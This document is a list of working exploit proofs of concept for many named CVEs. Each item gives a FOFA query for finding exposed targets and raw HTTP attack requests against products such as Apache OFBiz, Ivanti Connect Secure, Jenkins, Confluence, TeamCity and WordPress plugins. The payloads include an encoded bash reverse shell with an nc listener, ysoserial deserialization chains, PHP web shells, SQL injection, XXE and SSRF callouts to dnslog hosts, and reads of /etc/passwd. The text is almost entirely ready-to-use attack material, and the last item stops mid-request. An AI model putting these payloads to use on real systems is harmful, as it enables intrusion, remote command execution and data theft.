FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the placeholder in the POC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<nonce obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded (not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The output of the executed command is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The path must be sent verbatim (e.g. curl --path-as-is); most HTTP clients collapse the ../ segments before sending, and the request then looks harmless.

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

An out-of-band DNS/HTTP request to the dnslog host confirms that the external entity was resolved.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, passing the uuid obtained in step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

Time-based blind injection through the orderBy parameter: the response is delayed by 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and below authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
